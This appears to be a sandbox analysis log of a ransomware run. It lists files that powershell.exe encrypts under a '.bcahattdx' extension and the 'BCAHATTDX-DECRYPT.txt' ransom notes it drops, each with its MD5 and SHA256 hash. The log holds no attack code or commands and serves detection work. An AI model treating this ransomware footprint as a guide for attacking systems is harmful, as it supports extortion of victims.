––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Favorites\Links\Suggested Sites.url
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Downloads\wineselection.jpg
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Downloads\differenceinterface.png.bcahattdx
binary
MD5: 9eb4d4440c41fb423ddc36c5f7cc9447
SHA256: dd7eea4126413b59b502fc54813ce0424f1f7d0e54795ee9800b9be4194b2256
672
powershell.exe
C:\Users\admin\Downloads\modeoutside.png.bcahattdx
binary
MD5: 80396a0689baebc0d03521215a15a9fc
SHA256: 045868b51a24b3e13f42e6a5459a4bd1db7be5ae51a8d490862b9cbc0ac246bc
672
powershell.exe
C:\Users\admin\Downloads\backbreak.jpg.bcahattdx
binary
MD5: a4a4aa186c02e1a148e288faa00c0488
SHA256: 59782af4974515c96cb10fe6a626af8fae0e0f7b4d73cb2548fcfb2918184b87
672
powershell.exe
C:\Users\admin\Downloads\modeoutside.png
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Downloads\differenceinterface.png
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Downloads\backbreak.jpg
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Downloads\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook.pst.bcahattdx
binary
MD5: ce05d3547ff2ba6d050efb0c36f7fe51
SHA256: 7e3cc459c7be54dbc8443f987f74c689347023b09a52356b5ef7fdd8efc49356
672
powershell.exe
C:\Users\admin\Downloads\asianways.jpg.bcahattdx
binary
MD5: 4b466ceaf6290035194be38bc4cf032e
SHA256: c258c00036af4e43f92ee17206febbbcba3cb7ae3609a8c0b00fc5c87e3af063
672
powershell.exe
C:\Users\admin\Downloads\asianways.jpg
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook.pst
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst.bcahattdx
binary
MD5: 6aaa23803161446d6074c5ada582aab9
SHA256: 8c27717d50c08cda4c216500d09b0f74997470fc29bd33414a9cec4745e17c8f
672
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst.bcahattdx
binary
MD5: 8c504f0e9931765b11d8bd1f8f5ef1e6
SHA256: 827d9275588b7e693fdc3f010e5e914177aae089c2055ae1558d3472215350f3
672
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one.bcahattdx
binary
MD5: 8e06126578e01859980572f383910478
SHA256: 04718f1182330e8f3d7e3a7449bac879f41625432806c5e9b2a79f7dc0f3cab3
672
powershell.exe
C:\Users\admin\Documents\Outlook Files\[email protected]
binary
MD5: f53186fc040efffe5164bb2c3983fb06
SHA256: 32111d70cf6234515c1546657a32ff807b4fb278cce6583cbc2478c7a76549b5
672
powershell.exe
C:\Users\admin\Documents\Outlook Files\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\Documents\Outlook Files\[email protected]
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2.bcahattdx
binary
MD5: 1ee722eca7c2d2b8acf8aed730e491d6
SHA256: 09840fc301c7f664e6887f95af80d250223a4c858c219272203b164751142cb7
672
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one.bcahattdx
vc
MD5: 7a582def2a1588179a0acde6030939dd
SHA256: 1f66e45221df00ab55a6a58413aaa309b2db5fc8e48462bb9b3873ad1faa80f2
672
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Music\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\Documents\estrisk.rtf.bcahattdx
binary
MD5: 60431eeada4cb19af3659721d1c741a4
SHA256: 5435a50f76d2c358019430b21a7b9b155c80437684f5badce5e7a2e19bd4a556
672
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\Videos\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\Documents\multidirector.rtf.bcahattdx
binary
MD5: 5a77245dc05d3acf6da6e29dc4e08089
SHA256: ecb90b4722e2145221028479e5806f7831b36c128552bbb52786faeb77e0c21c
672
powershell.exe
C:\Users\admin\Pictures\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\Documents\estrisk.rtf
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Documents\multidirector.rtf
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Documents\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\Desktop\trackmaintenance.rtf.bcahattdx
binary
MD5: 2487ab9dca89ffa2a02ec74b260efe17
SHA256: 5a72db857f47696ea0df8a3bd3de6a6fa428e20fd9f8592d09fb81fbde813d75
672
powershell.exe
C:\Users\admin\Documents\businesssecurity.rtf.bcahattdx
binary
MD5: b04ec6c67940685f8259222d91675391
SHA256: 2875e85c71eaf9e6a2548fc90d7c4b7087ef9b6529cdc12ad01102fbd44a45c6
672
powershell.exe
C:\Users\admin\Desktop\trackmaintenance.rtf
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Documents\businesssecurity.rtf
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Desktop\hotelgermany.png.bcahattdx
binary
MD5: a968d6a759d748e1305d1b7a40f92994
SHA256: 670574b038a18edfef13e4169a9ee977a70ea95475019dc3f05ba2dacaacb6c5
672
powershell.exe
C:\Users\admin\Desktop\odeveloping.png.bcahattdx
binary
MD5: 2e8c71d9b180552dcb00a40cb9003953
SHA256: 6663dea447931b268f7477c5535c75b9795c3132a8c7c136d7965c70c18c8115
672
powershell.exe
C:\Users\admin\Desktop\tipssure.rtf.bcahattdx
binary
MD5: ca3dbf8b85f7970ecd6e9a1c7312fdf3
SHA256: 0d1ce29e6cb25ced87d894ca202ef09c525181c4f721ff5fca4fd7bc855ae57e
672
powershell.exe
C:\Users\admin\Desktop\odeveloping.png
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Desktop\tipssure.rtf
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Desktop\gfishing.rtf.bcahattdx
binary
MD5: 7c24c2d1f762521b3e7a390e0b7cb9a1
SHA256: e654cdd195615dd0a79fc2dba8d6353fd86e583dc1c3d943beb0c06d47427275
672
powershell.exe
C:\Users\admin\Desktop\hotelgermany.png
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Desktop\gfishing.rtf
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Desktop\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\Desktop\edgecable.jpg.bcahattdx
binary
MD5: e772bc6111dc83dbcc8295bd9a6763ef
SHA256: 56e858d4277b2683f0b0a6e63073d564dbf094e1a14686904beff3379e250298
672
powershell.exe
C:\Users\admin\Desktop\againstpanel.png.bcahattdx
binary
MD5: 5de223a693c142f3c9104b560bb8cf02
SHA256: 52b04d7e4e3fa8c1f696eb0c5d361d4a03ad669c6d07a5a38f8e5c35a83ad161
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\Desktop\edgecable.jpg
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Desktop\againstpanel.png
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Contacts\admin.contact.bcahattdx
binary
MD5: f856bad21950eca2a18f80df3f583c06
SHA256: 13d184f7e991b3d21109e228d374de52516a45d2a062b8892dafab8de592392f
672
powershell.exe
C:\Users\admin\Contacts\admin.contact
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\WinRAR\version.dat.bcahattdx
binary
MD5: 7825e80161a90eb1adce127905b098ee
SHA256: 468549a4b9f6a037b370cfcb45701291eb9bc464f77e36d355d3ddab433efdd4
672
powershell.exe
C:\Users\admin\Contacts\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\WinRAR\version.dat
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Sun\Java\Deployment\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Sun\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Sun\Java\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\WinRAR\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ul.conf.bcahattdx
binary
MD5: 4e3b4366b9165bc16adf59094e0980c1
SHA256: 65dc2d12824401ac7ef3b28d97ab1a6bb10010e93a76b3e925eae6a5668f313d
672
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\skypert.conf.bcahattdx
binary
MD5: 1948c9f9c9548ff2d3d8acc40883cc9c
SHA256: b11cc2d8d95f971767f4520a22dc07b4724b46399f6a65c331824e7a9cdb10ce
672
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\skypert.conf
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ul.conf
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ecs.conf.bcahattdx
binary
MD5: 98ba58e0a42854d5521b5f039569180f
SHA256: 4ee67f427b1831e46a47acb571811d402c1ebf218cdbf3b3e8318123c1d4a5d3
672
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ecs.conf
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\queue.db.bcahattdx
binary
MD5: 47e30409257c162913561ca2c9352ef0
SHA256: 62524966c924e2f05e84330755b4b8cb42ec6d14c79e832592a15aeba505da64
672
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\queue.db
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db.bcahattdx
binary
MD5: 1efe74a54ed1ba2a62ae6e7c00e0d0cd
SHA256: c64a817c94c2e6ff641e92db5d77cdf555a440c1a01ae1df64264d4e6b5c1643
672
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db-journal.bcahattdx
binary
MD5: 07c0f63e1422a4bff2ac3dd447bbc16c
SHA256: 747d6d3d43613a5e724072f00fab8c2b1d644f88a46b4d0795e99c59b00888da
672
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db-journal
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\logs\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared.xml.bcahattdx
binary
MD5: 6cd5a5cc65f9764fef215c58810a0165
SHA256: 78b4c46b2be5a800a17775a9715a0cb632bda8186f4177e48408b10b7deeb3df
672
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data.bcahattdx
binary
MD5: 79049862b5fcf6708c404e9ac7d0c71b
SHA256: badc7155885c20bda4d3afb39333485e06ce7ef28996d112cee480e45a160970
672
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml.bcahattdx
binary
MD5: 092ff12ad3f67bc0706bde485546cc9b
SHA256: 405f31eb398575e15fc7d272ccab0c168abd228e15caea3173b913685850bebf
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat.bcahattdx
binary
MD5: 9cb83c50a68530644b514ba310734f8d
SHA256: 13d2d9f7c2d434887e13e78b59807b66b4a2948c365179d53de23b2767cea8c6
672
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat.bcahattdx
binary
MD5: ae35930af013d7b15f2da92583b1039c
SHA256: be61367f5399837c11709745c8857cb56a1db2b3037ce5f6861f093e35b942fd
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini.bcahattdx
binary
MD5: 16518c23ee332c81be721d03c63ad05f
SHA256: 18b554990419b5f3683fe0640b04e5ba9a270f602355b938698d5fa8f071a006
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml.bcahattdx
binary
MD5: 30b60f5bda3ee2a7a55642238379b6e6
SHA256: 131b6a0c6ab946af5915cc460691906beb4d6cf6fa0bdfc509434bb8d167a02d
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml.bcahattdx
binary
MD5: 6254031bfced09340125a589b8ae5560
SHA256: b36c0a4a216e36fae60964de38a0e01ca2844a0d25f43180c9c8d66807e64a33
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css.bcahattdx
binary
MD5: f189fd218b065ff337dba79a96c9c9f7
SHA256: 5a04db243001fc8eaaaa2d91fcec5e95bd17b5d5de44eabb3bf760dbec21f2c4
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css.bcahattdx
binary
MD5: 6caa0920608fc3ac002f4c4e4d3a8b44
SHA256: 61f6ccb35017bc7994c6ec905f6c888305ed00cff973dc5a72ea9dea851ebcff
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css.bcahattdx
binary
MD5: 876f75d6acef775e61430ead0ada2f16
SHA256: 7011b5ba7b402a1bc9a74b6b769fc2e12ee4a74130e165b1405cb4bbfabb9fb9
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css.bcahattdx
binary
MD5: 28518e7e12244b0c471151e7c0c21d02
SHA256: 5ac3e77386bb169947d479c4e75b55d0d33c2f8666166c9580185f5731cd405b
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css.bcahattdx
binary
MD5: 6b81a2a69a6cf58e616299e86c883a7e
SHA256: 6f905aebf26adabc56f1c12be51bb303e6466473638620bb0ade3ea1689f5c6b
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css.bcahattdx
binary
MD5: ee9fb024497659b8d29830312d70d73c
SHA256: 293e8e3974bf49a21f4e5a1df1f0a065f3e81a2aa506113c9006ff69d650ddbf
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css.bcahattdx
binary
MD5: c06e682a2ad462f023d1325f5fee9b71
SHA256: 4560db6f46269558bf7b76043a43d7cf9a52b9b4045a502d5d66c22a1027604c
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css.bcahattdx
binary
MD5: 5992b44d43eb80756dc9d3f22998946e
SHA256: c4ec409b5100ddb2217cd094922f933919503c00a3f19ff00a61deaa5d088bc1
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css.bcahattdx
binary
MD5: 9fc239d71aa9aff8dbf8e5162fc0320b
SHA256: abf28731410474ba5a1d0fbbe85211da8d85fd63b7f12851de8ec594ce60791a
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css.bcahattdx
binary
MD5: 158b890d792ab60c69ae8433a6cccf56
SHA256: f9a7f1ffb5df7c43f93e2284f07e3e435d0812de43e7432a7cf0ffcc5ed9dd18
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css.bcahattdx
binary
MD5: 5833db35de3e3823940cfef23c9ad7d7
SHA256: eef5d8f8763db5f2f2f60d2ebd7a6fab538ea6db2c41f0e173c39b825dffa6f7
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css.bcahattdx
binary
MD5: febbe66d3f930201b6bc0d5bc9bed35c
SHA256: fe671a48c3e5e5383d9d1684cab7fafc9b3e763b8e399118bccec7a96244d710
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css.bcahattdx
binary
MD5: ead443b26e1d99644a2526a8931547e2
SHA256: 82f967c436652eec951275be2ef5bdc48420d435c720d6258e2aea884b04ecd0
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css.bcahattdx
binary
MD5: 9e70a0067ff8f515166dbbf64cb7629f
SHA256: 824dad8e07738e8ec00b0c46f1e4d3e0b3fcd6a13c19bfe78fc1837766b5b6d4
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css.bcahattdx
binary
MD5: a9bc43f1cb69d8f3437f795b7d66094e
SHA256: ad06b8d6d99c1eaf8a3903efd43659d5649e92c1a6103b7bfe5756134c5c7bdb
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css.bcahattdx
mp3
MD5: 27329eb8a8b3620986ddc6657ecdd005
SHA256: 684aae3dd3e4094f6ed18a18e6985473a17f8be2a022c8a57a7e447cdf50c20b
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini.bcahattdx
binary
MD5: c74269865a7a849e1c37bdd0ecf4ec74
SHA256: b8bcce1f3a1771561a153b40666a46c9dbc542220340391cddf5187c8cd0bfd2
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak.bcahattdx
binary
MD5: b05e9d277febc8b18550586f3dd95c8b
SHA256: cea20802464a6ae86727960fd95c60b35c2c413f68b6be689e87a5cc41cb007b
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bcahattdx
binary
MD5: fb3c16353cfb93307e383d502a977283
SHA256: 0b422cb75e33023d8625e031687f5c8e1228eb753001c7d791575db6acbba307
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat.bcahattdx
binary
MD5: 840aa9ad24416295c90635a8be6ae7ff
SHA256: 5e87268e645599ac553ba61f583f1ac6816bf01c858d94627c346871892fc7fa
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat.bcahattdx
binary
MD5: 30421ddf28d6923a5bb033dd32327c00
SHA256: e00741146131130ebfc9cf3d2391594215d642281c5904bcbf13243141b88f22
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat.bcahattdx
binary
MD5: de362807a7f92a1c9207b7202efe911d
SHA256: 24d90f98ce40af9eb2816ffa3ee3cb20a8af4c03c678fa4b4aebeb8221b032a5
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat.bcahattdx
binary
MD5: b27f97b807e73d5ab501cd36bdce85e5
SHA256: 8951a4b636ecaeedb0d27f3508629601e1f8396fbbaabf9d850896f622f409b4
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat.bcahattdx
binary
MD5: f7e0da3f3285fbadbbf93d207cd79b12
SHA256: e906a9df8c3bf82dea1d331dca232648edf0f17485ca2fb31c8bf769bf2604ab
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat.bcahattdx
binary
MD5: 84d2202c2271a778cea7a1871d46ef8e
SHA256: b638dcf7d30b827172d84d8d248be0a759dca733c7b593fa2908c5d13e572193
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini.bcahattdx
binary
MD5: 0f6ed10606ad48f402b40b73720d09f1
SHA256: d64f037d091295da9605e2b6000de64ceb0cb3b5bc3e4fe6dfc159ae951481bd
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat.bcahattdx
binary
